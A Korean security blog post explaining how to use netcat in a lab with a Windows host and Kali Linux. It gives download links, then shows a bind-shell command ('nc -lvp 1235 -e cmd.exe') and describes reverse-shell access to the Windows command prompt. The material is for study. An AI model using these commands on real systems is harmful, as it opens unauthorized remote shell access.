![[Web Hacking & Security] NC(Netcat) 사용방법](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc5GzJA%2FbtqAOcTFXhM%2F3UQkryqKTWKHKh1I5iwOM1%2Fimg.png)
- NC는 다양한 목적으로 활용이 가능한 툴이다.
- 주로 백도어 쉘 또는 리버스 쉘 기능을 사용할 수 있다.
윈도우용 NC 다운로드
https://eternallybored.org/misc/netcat/
netcat 1.11 for Win32/Win64
eternallybored.org
리눅스용 NC 다운로드
https://sourceforge.net/projects/nc110/
Netcat
Download Netcat for free. Memorial of original *Hobbit*'s version 1.10 of netcat tool. nc is a Swiss Army knife utility to write and read data across TCP and UDP network connections.
sourceforge.net
1. 백도어 쉘 (Backdoor Shell)
- NC를 사용하여 특정 포트를 Listening 상태로 열어놓고, 외부에서 해당 포트의 존재를 알고있는 사용자가 해당 포트로 접근 시 특정 권한을 부여하는 것이 가능하다. (ex. CMD)
- Window_A에서 nc가 있는 폴더에서 nc를 실행시켜 1235번 포트를 Listening 상태로 만든다.
- nc -lvp 1235 -e cmd.exe
- Kali Linux에서 telnet을 통해 1235번포트로 접속하면 cmd 관리자 권한을 얻을 수 있다.
- window_A에서 netstat로 확인해보면 ESTABLISHED상태인것을 확인할 수 있다.
2. 리버스 쉘 (Reverse Shell)
- 특정 시스템이 자신의 권한(cmd)을 들고 상대방 시스템(Kali)을 찾아가는 방식이다.
- Kali Linux에서 1235번 포트를 열어둔다.
- Window_A에서 1235번 포트로 cmd권한을 전송한다.
- Kali Linux에서 Window_A의 cmd권한을 얻은것을 확인할 수 있다.
'Hacking & Security > Web Hacking & Security' 카테고리의 다른 글
| [Web Hacking & Security] SQL Injection을 통한 Database Schema 파악 (0) | 2020.01.06 |
|---|---|
| [Web Hacking & Security] SQL Injection 공격 (0) | 2020.01.06 |
| [Web Hacking & Security] CSRF (Cross Site Request Forgery) 공격 (0) | 2020.01.03 |
| [Web Security & Hacking] XSF(Cross Site Flash) 공격 (0) | 2020.01.02 |
| [Web Hacking & Security] XSS(Cross Site Script) 공격 및 대응방법 (0) | 2020.01.02 |
공부&일상 블로그
포스팅이 좋았다면 "좋아요❤️" 또는 "구독👍🏻" 해주세요! 질문은 언제나 환영입니다😊
![[Web Hacking & Security] SQL Injection 공격](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FDRiTR%2FbtqAWxn5OZR%2FNqltYKhs1kgb9xFVfLGeS0%2Fimg.png)
![[Web Hacking & Security] CSRF (Cross Site Request Forgery) 공격](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FchTI9V%2FbtqAQO5I2kb%2FGXJFDDzI5qOTyJtYXwG090%2Fimg.png)
![[Web Security & Hacking] XSF(Cross Site Flash) 공격](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcea5AA%2FbtqAQkXM6IC%2FQx7VqfEJmd4PqH0VlBkGa1%2Fimg.png)
![[Web Hacking & Security] XSS(Cross Site Script) 공격 및 대응방법](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdE26DN%2FbtqARx9wr98%2FlpdsSr9b4hC4b8fwXsSue0%2Fimg.png)